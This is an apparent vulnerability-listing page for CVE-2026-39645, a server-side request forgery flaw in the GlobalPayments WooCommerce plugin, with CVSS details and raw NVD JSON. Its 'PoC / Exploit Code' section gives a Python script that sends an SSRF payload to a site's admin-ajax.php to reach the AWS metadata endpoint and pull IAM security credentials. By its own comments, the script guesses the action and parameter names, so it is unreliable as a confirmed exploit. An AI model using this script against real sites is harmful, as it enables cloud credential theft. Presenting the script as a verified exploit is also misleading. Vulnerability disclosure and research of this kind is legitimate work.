Security Vulnerability Report
中文
CVE-2026-39645 CVSS 5.4 MEDIUM

CVE-2026-39645

Published: 2026-04-08 09:16:35
Last Modified: 2026-04-24 18:06:25

Description

Server-Side Request Forgery (SSRF) vulnerability in Global Payments GlobalPayments WooCommerce global-payments-woocommerce allows Server Side Request Forgery.This issue affects GlobalPayments WooCommerce: from n/a through <= 1.18.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

GlobalPayments WooCommerce <= 1.18.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL of the vulnerable WooCommerce site target_url = "http://example.com/wp-admin/admin-ajax.php" # SSRF Payload: Attempting to access internal metadata service (AWS example) # Replace the parameter name with the actual vulnerable parameter if known ssrf_payload = { "action": "globalpayments_action", "target_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" } try: # Sending the request to trigger the SSRF response = requests.post(target_url, data=ssrf_payload, timeout=10) # Checking if the request was successful or if internal data was reflected if response.status_code == 200: print("[+] Request sent successfully.") print("Response Content:") print(response.text) # Logic to determine if internal data is leaked if "AccessKeyId" in response.text or "Code" in response.text: print("[!] Potential SSRF vulnerability confirmed! Internal data detected.") else: print("[-] Response does not contain obvious internal data, but vulnerability may exist.") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39645", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:35.340", "lastModified": "2026-04-24T18:06:24.707", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in Global Payments GlobalPayments WooCommerce global-payments-woocommerce allows Server Side Request Forgery.This issue affects GlobalPayments WooCommerce: from n/a through <= 1.18.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/global-payments-woocommerce/vulnerability/wordpress-globalpayments-woocommerce-plugin-1-18-0-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}